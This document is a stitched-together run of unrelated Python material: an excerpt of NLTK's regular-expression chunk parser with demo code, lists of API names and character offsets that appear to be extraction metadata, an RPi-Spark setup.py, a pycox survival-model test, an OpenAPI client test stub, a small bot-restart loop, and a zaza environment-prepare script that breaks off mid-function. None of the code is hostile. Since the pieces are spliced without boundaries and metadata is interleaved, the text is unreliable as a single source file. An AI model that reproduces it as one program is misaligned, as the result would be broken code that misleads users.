self._left_context_tag_pattern,
self._chunk_tag_pattern,
self._right_context_tag_pattern,
)
# //////////////////////////////////////////////////////
# Tag Pattern Format Conversion
# //////////////////////////////////////////////////////
# this should probably be made more strict than it is -- e.g., it
# currently accepts 'foo'.
CHUNK_TAG_PATTERN = re.compile(
r"^(({}|<{}>)*)$".format(r"([^\{\}<>]|\{\d+,?\}|\{\d*,\d+\})+", r"[^\{\}<>]+")
)
def tag_pattern2re_pattern(tag_pattern):
"""
Convert a tag pattern to a regular expression pattern. A "tag
pattern" is a modified version of a regular expression, designed
for matching sequences of tags. The differences between regular
expression patterns and tag patterns are:
- In tag patterns, ``'<'`` and ``'>'`` act as parentheses; so
``'<NN>+'`` matches one or more repetitions of ``'<NN>'``, not
``'<NN'`` followed by one or more repetitions of ``'>'``.
- Whitespace in tag patterns is ignored. So
``'<DT> | <NN>'`` is equivalent to ``'<DT>|<NN>'``
- In tag patterns, ``'.'`` is equivalent to ``'[^{}<>]'``; so
``'<NN.*>'`` matches any single tag starting with ``'NN'``.
In particular, ``tag_pattern2re_pattern`` performs the following
transformations on the given pattern:
- Replace '.' with '[^<>{}]'
- Remove any whitespace
- Add extra parens around '<' and '>', to make '<' and '>' act
like parentheses. E.g., so that in '<NN>+', the '+' has scope
over the entire '<NN>'; and so that in '<NN|IN>', the '|' has
scope over 'NN' and 'IN', but not '<' or '>'.
- Check to make sure the resulting pattern is valid.
:type tag_pattern: str
:param tag_pattern: The tag pattern to convert to a regular
expression pattern.
:raise ValueError: If ``tag_pattern`` is not a valid tag pattern.
In particular, ``tag_pattern`` should not include braces; and it
should not contain nested or mismatched angle-brackets.
:rtype: str
:return: A regular expression pattern corresponding to
``tag_pattern``.
"""
# Clean up the regular expression
tag_pattern = re.sub(r"\s", "", tag_pattern)
tag_pattern = re.sub(r"<", "(<(", tag_pattern)
tag_pattern = re.sub(r">", ")>)", tag_pattern)
# Check the regular expression
if not CHUNK_TAG_PATTERN.match(tag_pattern):
raise ValueError("Bad tag pattern: %r" % tag_pattern)
# Replace "." with CHUNK_TAG_CHAR.
# We have to do this after, since it adds {}[]<>s, which would
# confuse CHUNK_TAG_PATTERN.
# PRE doesn't have lookback assertions, so reverse twice, and do
# the pattern backwards (with lookahead assertions). This can be
# made much cleaner once we can switch back to SRE.
def reverse_str(str):
lst = list(str)
lst.reverse()
return "".join(lst)
tc_rev = reverse_str(ChunkString.CHUNK_TAG_CHAR)
reversed = reverse_str(tag_pattern)
reversed = re.sub(r"\.(?!\\(\\\\)*($|[^\\]))", tc_rev, reversed)
tag_pattern = reverse_str(reversed)
return tag_pattern
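# --- Illustrative sketch (added; not part of the NLTK source) ---
def _tag_pattern_demo():
    # '<' and '>' become grouping parentheses and '.' becomes CHUNK_TAG_CHAR,
    # so the '+' below scopes over the whole '<NN.*>' tag.
    return tag_pattern2re_pattern("<NN.*>+")  # -> '(<(NN[^\{\}<>]*)>)+'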
# //////////////////////////////////////////////////////
# RegexpChunkParser
# //////////////////////////////////////////////////////
class RegexpChunkParser(ChunkParserI):
"""
A regular expression based chunk parser. ``RegexpChunkParser`` uses a
sequence of "rules" to find chunks of a single type within a
text. The chunking of the text is encoded using a ``ChunkString``,
and each rule acts by modifying the chunking in the
``ChunkString``. The rules are all implemented using regular
expression matching and substitution.
The ``RegexpChunkRule`` class and its subclasses (``ChunkRule``,
``StripRule``, ``UnChunkRule``, ``MergeRule``, and ``SplitRule``)
define the rules that are used by ``RegexpChunkParser``. Each rule
defines an ``apply()`` method, which modifies the chunking encoded
by a given ``ChunkString``.
:type _rules: list(RegexpChunkRule)
:ivar _rules: The list of rules that should be applied to a text.
:type _trace: int
:ivar _trace: The default level of tracing.
"""
def __init__(self, rules, chunk_label="NP", root_label="S", trace=0):
"""
Construct a new ``RegexpChunkParser``.
:type rules: list(RegexpChunkRule)
:param rules: The sequence of rules that should be used to
generate the chunking for a tagged text.
:type chunk_label: str
:param chunk_label: The node value that should be used for
chunk subtrees. This is typically a short string
describing the type of information contained by the chunk,
such as ``"NP"`` for base noun phrases.
:type root_label: str
:param root_label: The node value that should be used for the
top node of the chunk structure.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
"""
self._rules = rules
self._trace = trace
self._chunk_label = chunk_label
self._root_label = root_label
def _trace_apply(self, chunkstr, verbose):
"""
Apply each rule of this ``RegexpChunkParser`` to ``chunkstr``, in
turn. Generate trace output between each rule. If ``verbose``
is true, then generate verbose output.
:type chunkstr: ChunkString
:param chunkstr: The chunk string to which each rule should be
applied.
:type verbose: bool
:param verbose: Whether output should be verbose.
:rtype: None
"""
print("# Input:")
print(chunkstr)
for rule in self._rules:
rule.apply(chunkstr)
if verbose:
print("#", rule.descr() + " (" + repr(rule) + "):")
else:
print("#", rule.descr() + ":")
print(chunkstr)
def _notrace_apply(self, chunkstr):
"""
Apply each rule of this ``RegexpChunkParser`` to ``chunkstr``, in
turn.
:param chunkstr: The chunk string to which each rule should be
applied.
:type chunkstr: ChunkString
:rtype: None
"""
for rule in self._rules:
rule.apply(chunkstr)
def parse(self, chunk_struct, trace=None):
"""
:type chunk_struct: Tree
:param chunk_struct: the chunk structure to be (further) chunked
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output. This value
overrides the trace level value that was given to the
constructor.
:rtype: Tree
:return: a chunk structure that encodes the chunks in a given
tagged sentence. A chunk is a non-overlapping linguistic
group, such as a noun phrase. The set of chunks
identified in the chunk structure depends on the rules
used to define this ``RegexpChunkParser``.
"""
if len(chunk_struct) == 0:
print("Warning: parsing empty text")
return Tree(self._root_label, [])
try:
chunk_struct.label()
except AttributeError:
chunk_struct = Tree(self._root_label, chunk_struct)
# Use the default trace value?
if trace is None:
trace = self._trace
chunkstr = ChunkString(chunk_struct)
# Apply the sequence of rules to the chunkstring.
if trace:
verbose = trace > 1
self._trace_apply(chunkstr, verbose)
else:
self._notrace_apply(chunkstr)
# Use the chunkstring to create a chunk structure.
return chunkstr.to_chunkstruct(self._chunk_label)
def rules(self):
"""
:return: the sequence of rules used by ``RegexpChunkParser``.
:rtype: list(RegexpChunkRule)
"""
return self._rules
def __repr__(self):
"""
:return: a concise string representation of this
``RegexpChunkParser``.
:rtype: str
"""
return "<RegexpChunkParser with %d rules>" % len(self._rules)
def __str__(self):
"""
:return: a verbose string representation of this ``RegexpChunkParser``.
:rtype: str
"""
s = "RegexpChunkParser with %d rules:\n" % len(self._rules)
margin = 0
for rule in self._rules:
margin = max(margin, len(rule.descr()))
if margin < 35:
format = " %" + repr(-(margin + 3)) + "s%s\n"
else:
format = " %s\n %s\n"
for rule in self._rules:
s += format % (rule.descr(), repr(rule))
return s[:-1]
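# --- Illustrative sketch (added; not part of the NLTK source) ---
def _regexp_chunk_parser_demo():
    rule = ChunkRule("<DT>?<JJ>*<NN.*>+", "Chunk sequences of det/adj/noun")
    parser = RegexpChunkParser([rule], chunk_label="NP")
    tagged = [("the", "DT"), ("little", "JJ"), ("cat", "NN"), ("sat", "VBD")]
    # -> (S (NP the/DT little/JJ cat/NN) sat/VBD)
    return parser.parse(Tree("S", tagged))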
# //////////////////////////////////////////////////////
# Chunk Grammar
# //////////////////////////////////////////////////////
class RegexpParser(ChunkParserI):
r"""
A grammar based chunk parser. ``chunk.RegexpParser`` uses a set of
regular expression patterns to specify the behavior of the parser.
The chunking of the text is encoded using a ``ChunkString``, and
each rule acts by modifying the chunking in the ``ChunkString``.
The rules are all implemented using regular expression matching
and substitution.
A grammar contains one or more clauses in the following form::
NP:
{<DT|JJ>} # chunk determiners and adjectives
}<[\.VI].*>+{ # strip any tag beginning with V, I, or .
<.*>}{<DT> # split a chunk at a determiner
<DT|JJ>{}<NN.*> # merge chunk ending with det/adj
# with one starting with a noun
The patterns of a clause are executed in order. An earlier
pattern may introduce a chunk boundary that prevents a later
pattern from executing. Sometimes an individual pattern will
match on multiple, overlapping extents of the input. As with
regular expression substitution more generally, the chunker will
identify the first match possible, then continue looking for matches
after this one has ended.
The clauses of a grammar are also executed in order. A cascaded
chunk parser is one having more than one clause. The maximum depth
of a parse tree created by this chunk parser is the same as the
number of clauses in the grammar.
When tracing is turned on, the comment portion of a line is displayed
each time the corresponding pattern is applied.
:type _start: str
:ivar _start: The start symbol of the grammar (the root node of
resulting trees)
    :type _stages: list(RegexpChunkParser)
:ivar _stages: The list of parsing stages corresponding to the grammar
"""
def __init__(self, grammar, root_label="S", loop=1, trace=0):
"""
Create a new chunk parser, from the given start state
and set of chunk patterns.
:param grammar: The grammar, or a list of RegexpChunkParser objects
:type grammar: str or list(RegexpChunkParser)
:param root_label: The top node of the tree being created
:type root_label: str or Nonterminal
:param loop: The number of times to run through the patterns
:type loop: int
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
"""
self._trace = trace
self._stages = []
self._grammar = grammar
self._loop = loop
if isinstance(grammar, str):
self._read_grammar(grammar, root_label, trace)
else:
            # Make sure the grammar looks like it has the right type:
type_err = (
"Expected string or list of RegexpChunkParsers " "for the grammar."
)
try:
grammar = list(grammar)
except BaseException as e:
raise TypeError(type_err) from e
for elt in grammar:
if not isinstance(elt, RegexpChunkParser):
raise TypeError(type_err)
self._stages = grammar
def _read_grammar(self, grammar, root_label, trace):
"""
Helper function for __init__: read the grammar if it is a
string.
"""
rules = []
lhs = None
for line in grammar.split("\n"):
line = line.strip()
# New stage begins if there's an unescaped ':'
m = re.match("(?P<nonterminal>(\\.|[^:])*)(:(?P<rule>.*))", line)
if m:
# Record the stage that we just completed.
self._add_stage(rules, lhs, root_label, trace)
# Start a new stage.
lhs = m.group("nonterminal").strip()
rules = []
line = m.group("rule").strip()
# Skip blank & comment-only lines
if line == "" or line.startswith("#"):
continue
# Add the rule
rules.append(RegexpChunkRule.fromstring(line))
# Record the final stage
self._add_stage(rules, lhs, root_label, trace)
def _add_stage(self, rules, lhs, root_label, trace):
"""
Helper function for __init__: add a new stage to the parser.
"""
if rules != []:
if not lhs:
raise ValueError("Expected stage marker (eg NP:)")
parser = RegexpChunkParser(
rules, chunk_label=lhs, root_label=root_label, trace=trace
)
self._stages.append(parser)
def parse(self, chunk_struct, trace=None):
"""
Apply the chunk parser to this input.
:type chunk_struct: Tree
:param chunk_struct: the chunk structure to be (further) chunked
(this tree is modified, and is also returned)
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output. This value
overrides the trace level value that was given to the
constructor.
:return: the chunked output.
:rtype: Tree
"""
if trace is None:
trace = self._trace
for i in range(self._loop):
for parser in self._stages:
chunk_struct = parser.parse(chunk_struct, trace=trace)
return chunk_struct
def __repr__(self):
"""
:return: a concise string representation of this ``chunk.RegexpParser``.
:rtype: str
"""
return "<chunk.RegexpParser with %d stages>" % len(self._stages)
def __str__(self):
"""
:return: a verbose string representation of this
``RegexpParser``.
:rtype: str
"""
s = "chunk.RegexpParser with %d stages:\n" % len(self._stages)
margin = 0
for parser in self._stages:
s += "%s\n" % parser
return s[:-1]
# //////////////////////////////////////////////////////
# Demonstration code
# //////////////////////////////////////////////////////
def demo_eval(chunkparser, text):
"""
Demonstration code for evaluating a chunk parser, using a
``ChunkScore``. This function assumes that ``text`` contains one
sentence per line, and that each sentence has the form expected by
``tree.chunk``. It runs the given chunk parser on each sentence in
the text, and scores the result. It prints the final score
(precision, recall, and f-measure); and reports the set of chunks
that were missed and the set of chunks that were incorrect. (At
most 10 missing chunks and 10 incorrect chunks are reported).
:param chunkparser: The chunkparser to be tested
:type chunkparser: ChunkParserI
:param text: The chunked tagged text that should be used for
evaluation.
:type text: str
"""
from nltk import chunk
from nltk.tree import Tree
# Evaluate our chunk parser.
chunkscore = chunk.ChunkScore()
for sentence in text.split("\n"):
print(sentence)
sentence = sentence.strip()
if not sentence:
continue
gold = chunk.tagstr2tree(sentence)
tokens = gold.leaves()
test = chunkparser.parse(Tree("S", tokens), trace=1)
chunkscore.score(gold, test)
print()
print("/" + ("=" * 75) + "\\")
print("Scoring", chunkparser)
print("-" * 77)
print("Precision: %5.1f%%" % (chunkscore.precision() * 100), " " * 4, end=" ")
print("Recall: %5.1f%%" % (chunkscore.recall() * 100), " " * 6, end=" ")
print("F-Measure: %5.1f%%" % (chunkscore.f_measure() * 100))
# Missed chunks.
if chunkscore.missed():
print("Missed:")
missed = chunkscore.missed()
for chunk in missed[:10]:
print(" ", " ".join(map(str, chunk)))
if len(chunkscore.missed()) > 10:
print(" ...")
# Incorrect chunks.
if chunkscore.incorrect():
print("Incorrect:")
incorrect = chunkscore.incorrect()
for chunk in incorrect[:10]:
print(" ", " ".join(map(str, chunk)))
if len(chunkscore.incorrect()) > 10:
print(" ...")
print("\\" + ("=" * 75) + "/")
print()
def demo():
"""
A demonstration for the ``RegexpChunkParser`` class. A single text is
parsed with four different chunk parsers, using a variety of rules
and strategies.
"""
from nltk import Tree, chunk
text = """\
[ the/DT little/JJ cat/NN ] sat/VBD on/IN [ the/DT mat/NN ] ./.
[ John/NNP ] saw/VBD [the/DT cats/NNS] [the/DT dog/NN] chased/VBD ./.
[ John/NNP ] thinks/VBZ [ Mary/NN ] saw/VBD [ the/DT cat/NN ] sit/VB on/IN [ the/DT mat/NN ]./.
"""
print("*" * 75)
print("Evaluation text:")
print(text)
print("*" * 75)
print()
grammar = r"""
NP: # NP stage
{<DT>?<JJ>*<NN>} # chunk determiners, adjectives and nouns
{<NNP>+} # chunk proper nouns
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
grammar = r"""
NP:
{<.*>} # start by chunking each tag
}<[\.VI].*>+{ # unchunk any verbs, prepositions or periods
<DT|JJ>{}<NN.*> # merge det/adj with nouns
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
grammar = r"""
NP: {<DT>?<JJ>*<NN>} # chunk determiners, adjectives and nouns
VP: {<TO>?<VB.*>} # VP = verb words
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
grammar = r"""
NP: {<.*>*} # start by chunking everything
}<[\.VI].*>+{ # strip any verbs, prepositions or periods
<.*>}{<DT> # separate on determiners
PP: {<IN><NP>} # PP = preposition + noun phrase
VP: {<VB.*><NP|PP>*} # VP = verb words + NPs and PPs
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
# Evaluation
from nltk.corpus import conll2000
print()
print("Demonstration of empty grammar:")
cp = chunk.RegexpParser("")
print(chunk.accuracy(cp, conll2000.chunked_sents("test.txt", chunk_types=("NP",))))
print()
print("Demonstration of accuracy evaluation using CoNLL tags:")
grammar = r"""
NP:
{<.*>} # start by chunking each tag
}<[\.VI].*>+{ # unchunk any verbs, prepositions or periods
<DT|JJ>{}<NN.*> # merge det/adj with nouns
"""
cp = chunk.RegexpParser(grammar)
print(chunk.accuracy(cp, conll2000.chunked_sents("test.txt")[:5]))
print()
print("Demonstration of tagged token input")
grammar = r"""
NP: {<.*>*} # start by chunking everything
}<[\.VI].*>+{ # strip any verbs, prepositions or periods
<.*>}{<DT> # separate on determiners
PP: {<IN><NP>} # PP = preposition + noun phrase
VP: {<VB.*><NP|PP>*} # VP = verb words + NPs and PPs
"""
cp = chunk.RegexpParser(grammar)
print(
cp.parse(
[
("the", "DT"),
("little", "JJ"),
("cat", "NN"),
("sat", "VBD"),
("on", "IN"),
("the", "DT"),
("mat", "NN"),
(".", "."),
]
)
)
if __name__ == "__main__":
demo()
|
[
"nltk.Tree",
"re.split",
"nltk.chunk.tagstr2tree",
"re.match",
"nltk.corpus.conll2000.chunked_sents",
"nltk.chunk.ChunkScore",
"nltk.chunk.RegexpParser",
"re.sub",
"re.compile"
] |
[((2382, 2424), 're.compile', 're.compile', (["('^(\\\\{?%s\\\\}?)*?$' % CHUNK_TAG)"], {}), "('^(\\\\{?%s\\\\}?)*?$' % CHUNK_TAG)\n", (2392, 2424), False, 'import re\n'), ((2440, 2464), 're.compile', 're.compile', (['"""[^\\\\{\\\\}]+"""'], {}), "('[^\\\\{\\\\}]+')\n", (2450, 2464), False, 'import re\n'), ((2489, 2513), 're.compile', 're.compile', (['"""(\\\\{\\\\})*$"""'], {}), "('(\\\\{\\\\})*$')\n", (2499, 2513), False, 'import re\n'), ((35514, 35544), 're.sub', 're.sub', (['"""\\\\s"""', '""""""', 'tag_pattern'], {}), "('\\\\s', '', tag_pattern)\n", (35520, 35544), False, 'import re\n'), ((35563, 35594), 're.sub', 're.sub', (['"""<"""', '"""(<("""', 'tag_pattern'], {}), "('<', '(<(', tag_pattern)\n", (35569, 35594), False, 'import re\n'), ((35614, 35645), 're.sub', 're.sub', (['""">"""', '""")>)"""', 'tag_pattern'], {}), "('>', ')>)', tag_pattern)\n", (35620, 35645), False, 'import re\n'), ((36338, 36399), 're.sub', 're.sub', (['"""\\\\.(?!\\\\\\\\(\\\\\\\\\\\\\\\\)*($|[^\\\\\\\\]))"""', 'tc_rev', 'reversed'], {}), "('\\\\.(?!\\\\\\\\(\\\\\\\\\\\\\\\\)*($|[^\\\\\\\\]))', tc_rev, reversed)\n", (36344, 36399), False, 'import re\n'), ((50006, 50024), 'nltk.chunk.ChunkScore', 'chunk.ChunkScore', ([], {}), '()\n', (50022, 50024), False, 'from nltk import Tree, chunk\n'), ((52059, 52086), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52077, 52086), False, 'from nltk import Tree, chunk\n'), ((52335, 52362), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52353, 52362), False, 'from nltk import Tree, chunk\n'), ((52540, 52567), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52558, 52567), False, 'from nltk import Tree, chunk\n'), ((52934, 52961), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52952, 52961), False, 'from nltk import Tree, chunk\n'), ((53111, 53133), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['""""""'], {}), "('')\n", (53129, 53133), False, 'from nltk import Tree, chunk\n'), ((53527, 53554), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (53545, 53554), False, 'from nltk import Tree, chunk\n'), ((54030, 54057), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (54048, 54057), False, 'from nltk import Tree, chunk\n'), ((6198, 6225), 're.split', 're.split', (['"""[{}]"""', 'self._str'], {}), "('[{}]', self._str)\n", (6206, 6225), False, 'import re\n'), ((6731, 6761), 'nltk.Tree', 'Tree', (['self._root_label', 'pieces'], {}), '(self._root_label, pieces)\n', (6735, 6761), False, 'from nltk import Tree, chunk\n'), ((7958, 7989), 're.sub', 're.sub', (['regexp', 'repl', 'self._str'], {}), '(regexp, repl, self._str)\n', (7964, 7989), False, 'import re\n'), ((8183, 8206), 're.sub', 're.sub', (['"""\\\\{\\\\}"""', '""""""', 's'], {}), "('\\\\{\\\\}', '', s)\n", (8189, 8206), False, 'import re\n'), ((9071, 9106), 're.sub', 're.sub', (['""">(?!\\\\})"""', '"""> """', 'self._str'], {}), "('>(?!\\\\})', '> ', self._str)\n", (9077, 9106), False, 'import re\n'), ((9122, 9155), 're.sub', 're.sub', (['"""([^\\\\{])<"""', '"""\\\\1 <"""', 'str'], {}), "('([^\\\\{])<', '\\\\1 <', str)\n", (9128, 9155), False, 'import re\n'), ((13595, 13650), 're.match', 're.match', (['"""(?P<rule>(\\\\\\\\.|[^#])*)(?P<comment>#.*)?"""', 's'], {}), "('(?P<rule>(\\\\\\\\.|[^#])*)(?P<comment>#.*)?', s)\n", (13603, 13650), False, 'import re\n'), ((50185, 50212), 'nltk.chunk.tagstr2tree', 'chunk.tagstr2tree', (['sentence'], {}), '(sentence)\n', (50202, 50212), False, 'from nltk import Tree, chunk\n'), ((5474, 5500), 're.split', 're.split', (['"""[\\\\{\\\\}<>]+"""', 's'], {}), "('[\\\\{\\\\}<>]+', s)\n", (5482, 5500), False, 'import re\n'), ((11503, 11521), 're.compile', 're.compile', (['regexp'], {}), '(regexp)\n', (11513, 11521), False, 'import re\n'), ((40866, 40892), 'nltk.Tree', 'Tree', (['self._root_label', '[]'], {}), '(self._root_label, [])\n', (40870, 40892), False, 'from nltk import Tree, chunk\n'), ((46347, 46408), 're.match', 're.match', (['"""(?P<nonterminal>(\\\\.|[^:])*)(:(?P<rule>.*))"""', 'line'], {}), "('(?P<nonterminal>(\\\\.|[^:])*)(:(?P<rule>.*))', line)\n", (46355, 46408), False, 'import re\n'), ((50277, 50294), 'nltk.Tree', 'Tree', (['"""S"""', 'tokens'], {}), "('S', tokens)\n", (50281, 50294), False, 'from nltk import Tree, chunk\n'), ((53163, 53219), 'nltk.corpus.conll2000.chunked_sents', 'conll2000.chunked_sents', (['"""test.txt"""'], {'chunk_types': "('NP',)"}), "('test.txt', chunk_types=('NP',))\n", (53186, 53219), False, 'from nltk.corpus import conll2000\n'), ((40998, 41034), 'nltk.Tree', 'Tree', (['self._root_label', 'chunk_struct'], {}), '(self._root_label, chunk_struct)\n', (41002, 41034), False, 'from nltk import Tree, chunk\n'), ((53584, 53619), 'nltk.corpus.conll2000.chunked_sents', 'conll2000.chunked_sents', (['"""test.txt"""'], {}), "('test.txt')\n", (53607, 53619), False, 'from nltk.corpus import conll2000\n'), ((6507, 6537), 'nltk.Tree', 'Tree', (['chunk_label', 'subsequence'], {}), '(chunk_label, subsequence)\n', (6511, 6537), False, 'from nltk import Tree, chunk\n'), ((14389, 14427), 're.match', 're.match', (['"""[^{}]*{[^{}]*}[^{}]*"""', 'rule'], {}), "('[^{}]*{[^{}]*}[^{}]*', rule)\n", (14397, 14427), False, 'import re\n'), ((14466, 14488), 're.split', 're.split', (['"""[{}]"""', 'rule'], {}), "('[{}]', rule)\n", (14474, 14488), False, 'import re\n')]
|
#
# RPi-Spark pHAT Drives
# Author: <NAME>
# 2018.6.6
# 2020.7.18 Fix screenCenter incorrect error
#
from setuptools import setup, find_packages
classifiers = [
'Development Status :: 4 - Beta',
'Operating System :: POSIX :: Linux',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development',
'Topic :: System :: Hardware',
'Topic :: System :: Hardware :: Hardware Drivers'
]
keywords = (
    "development kit",
    "oled",
    "monochrome greyscale color",
    "ssd1306",
    "mpu6050",
    "attitude shake motion gyroscope accelerometer thermometer sensor",
    "spi i2c 128x64",
    "key buttons",
    "joystick game",
    "audio speaker headset headphone earphone",
    "pwm tone",
    "ogg mp3 wave",
    "gpio extended pads",
)
desc = 'The RPi-Spark pHAT lets you easily develop interesting applications using the GPIO of the Raspberry Pi. It includes an SSD1306 128x64 OLED, an MPU6050 sensor (gyroscope, accelerometer, thermometer), a 5-way joystick, 2 push buttons, a 3.5mm stereo headphone jack, a speaker and 19 extended GPIO pads'
setup (
name = 'JMRPi.Spark',
version = '1.0.10',
author = '<NAME>',
author_email = '<EMAIL>',
description = desc,
long_description = desc,
platforms = ['Linux'],
license = 'MIT',
classifiers = classifiers,
keywords = keywords,
url = 'https://github.com/mobinrg/rpi_spark_drives',
dependency_links = [],
install_requires = [],
packages = find_packages()
)
|
[
"setuptools.find_packages"
] |
[((1575, 1590), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (1588, 1590), False, 'from setuptools import setup, find_packages\n')]
|
import pytest
from pycox.models import BCESurv
import torchtuples as tt
from utils_model_testing import make_dataset, fit_model, assert_survs
@pytest.mark.parametrize('numpy', [True, False])
@pytest.mark.parametrize('num_durations', [2, 5])
def test_pmf_runs(numpy, num_durations):
data = make_dataset(True)
input, target = data
labtrans = BCESurv.label_transform(num_durations)
target = labtrans.fit_transform(*target)
data = tt.tuplefy(input, target)
if not numpy:
data = data.to_tensor()
net = tt.practical.MLPVanilla(input.shape[1], [4], labtrans.out_features)
model = BCESurv(net)
fit_model(data, model)
assert_survs(input, model)
model.duration_index = labtrans.cuts
assert_survs(input, model)
cdi = model.interpolate(3, 'const_pdf')
assert_survs(input, cdi)
|
[
"torchtuples.practical.MLPVanilla",
"pycox.models.BCESurv",
"utils_model_testing.make_dataset",
"utils_model_testing.fit_model",
"torchtuples.tuplefy",
"utils_model_testing.assert_survs",
"pycox.models.BCESurv.label_transform",
"pytest.mark.parametrize"
] |
[((146, 193), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""numpy"""', '[True, False]'], {}), "('numpy', [True, False])\n", (169, 193), False, 'import pytest\n'), ((195, 243), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""num_durations"""', '[2, 5]'], {}), "('num_durations', [2, 5])\n", (218, 243), False, 'import pytest\n'), ((296, 314), 'utils_model_testing.make_dataset', 'make_dataset', (['(True)'], {}), '(True)\n', (308, 314), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((355, 393), 'pycox.models.BCESurv.label_transform', 'BCESurv.label_transform', (['num_durations'], {}), '(num_durations)\n', (378, 393), False, 'from pycox.models import BCESurv\n'), ((450, 475), 'torchtuples.tuplefy', 'tt.tuplefy', (['input', 'target'], {}), '(input, target)\n', (460, 475), True, 'import torchtuples as tt\n'), ((536, 603), 'torchtuples.practical.MLPVanilla', 'tt.practical.MLPVanilla', (['input.shape[1]', '[4]', 'labtrans.out_features'], {}), '(input.shape[1], [4], labtrans.out_features)\n', (559, 603), True, 'import torchtuples as tt\n'), ((616, 628), 'pycox.models.BCESurv', 'BCESurv', (['net'], {}), '(net)\n', (623, 628), False, 'from pycox.models import BCESurv\n'), ((633, 655), 'utils_model_testing.fit_model', 'fit_model', (['data', 'model'], {}), '(data, model)\n', (642, 655), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((660, 686), 'utils_model_testing.assert_survs', 'assert_survs', (['input', 'model'], {}), '(input, model)\n', (672, 686), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((732, 758), 'utils_model_testing.assert_survs', 'assert_survs', (['input', 'model'], {}), '(input, model)\n', (744, 758), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((807, 831), 'utils_model_testing.assert_survs', 'assert_survs', (['input', 'cdi'], {}), '(input, cdi)\n', (819, 831), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n')]
|
# coding: utf-8
"""
App::Netdisco
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.050003
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import openapi_netdisco
from openapi_netdisco.api.general_api import GeneralApi # noqa: E501
from openapi_netdisco.rest import ApiException
class TestGeneralApi(unittest.TestCase):
"""GeneralApi unit test stubs"""
def setUp(self):
self.api = openapi_netdisco.api.general_api.GeneralApi() # noqa: E501
def tearDown(self):
pass
def test_login_post(self):
"""Test case for login_post
"""
pass
def test_logout_get(self):
"""Test case for logout_get
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"openapi_netdisco.api.general_api.GeneralApi"
] |
[((909, 924), 'unittest.main', 'unittest.main', ([], {}), '()\n', (922, 924), False, 'import unittest\n'), ((590, 635), 'openapi_netdisco.api.general_api.GeneralApi', 'openapi_netdisco.api.general_api.GeneralApi', ([], {}), '()\n', (633, 635), False, 'import openapi_netdisco\n')]
|
import time
import os
import asyncio
from conf import debug
while True:
if debug:
n = 0
else:
n = 5
os.system("python3 C:\\Users\\qvalador\\Documents\\Code\\scout\\bot.py")
    print("the bot died, restarting in %d seconds" % n)
time.sleep(n)
|
[
"os.system",
"time.sleep"
] |
[((129, 201), 'os.system', 'os.system', (['"""python3 C:\\\\Users\\\\qvalador\\\\Documents\\\\Code\\\\scout\\\\bot.py"""'], {}), "('python3 C:\\\\Users\\\\qvalador\\\\Documents\\\\Code\\\\scout\\\\bot.py')\n", (138, 201), False, 'import os\n'), ((249, 262), 'time.sleep', 'time.sleep', (['n'], {}), '(n)\n', (259, 262), False, 'import time\n')]
|
# Copyright 2018 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run prepare phase."""
import argparse
import logging
import sys
import zaza.controller
import zaza.model
import zaza.charm_lifecycle.utils as utils
import zaza.utilities.cli as cli_utils
import zaza.utilities.run_report as run_report
import zaza.utilities.deployment_env as deployment_env
@run_report.register_event_wrapper('Prepare Environment')
def prepare(model_name):
"""Run all steps to prepare the environment before a functional test run.
    :param model_name: Name of model to add
    :type model_name: str
"""
zaza.controller.add_model(
model_name,
config=deployment_env.get_model_settings(),
region=deployment_env.get_cloud_region())
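    # pin model-level constraints on the newly created model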
zaza.model.set_model_constraints(
model_name=model_name,
constraints=deployment_env.get_model_constraints())
def parse_args(args):
"""Parse command line arguments.
    :param args: List of command line arguments
    :type args: [str1, str2, ...]
:returns: Parsed arguments
:rtype: Namespace
"""
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model-name', help='Name of model to add')
parser.add_argument('--log', dest='loglevel',
help='Loglevel [DEBUG|INFO|WARN|ERROR|CRITICAL]')
